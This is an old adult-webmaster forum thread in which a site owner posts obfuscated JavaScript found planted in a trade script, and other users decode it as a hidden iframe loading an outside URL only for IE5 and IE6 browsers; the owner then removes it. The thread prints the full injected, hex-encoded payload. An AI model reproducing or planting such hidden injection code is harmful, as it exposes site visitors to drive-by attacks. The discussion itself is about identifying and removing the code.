GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Found some suspicious code.....any ideas? (https://gfy.com/showthread.php?t=823876)

Ditosta 04-23-2008 12:32 PM
Found some suspicious code.....any ideas?
 
Found this on one of my trade scripts
PHP Code:
<s c r i p t> var s='3C696672616D65207372633D22687474703A2F2F7777772E746869737472616E6E792E636F6D2F746F706C6973742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</s c r i p t 

CurrentlySober 04-23-2008 12:39 PM
any ideas? yes...

get someone who understands what it means to tell you...

OK, its a silly answer, but...

ITS ALSO A BUMP ! :)

mrkris 04-23-2008 12:41 PM
1. It's javascript
2. It tells your browser to open an iframe to http://www.thistranny.com/toplist/static.php and hides it.

GrouchyAdmin 04-23-2008 12:44 PM
[an error occurred while processing this directive]

donborno 04-23-2008 12:44 PM
Quote:
Originally Posted by mrkris (Post 14103195)
1. It's javascript
2. It tells your browser to open an iframe to http://www.thistranny.com/toplist/static.php and hides it.
But only if you use IE6.0 or IE5.x

woj 04-23-2008 12:46 PM
safe bet is to probably remove it...

Ditosta 04-23-2008 01:19 PM
Thanks guys! It has been removed


All times are GMT -7. The time now is 07:13 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123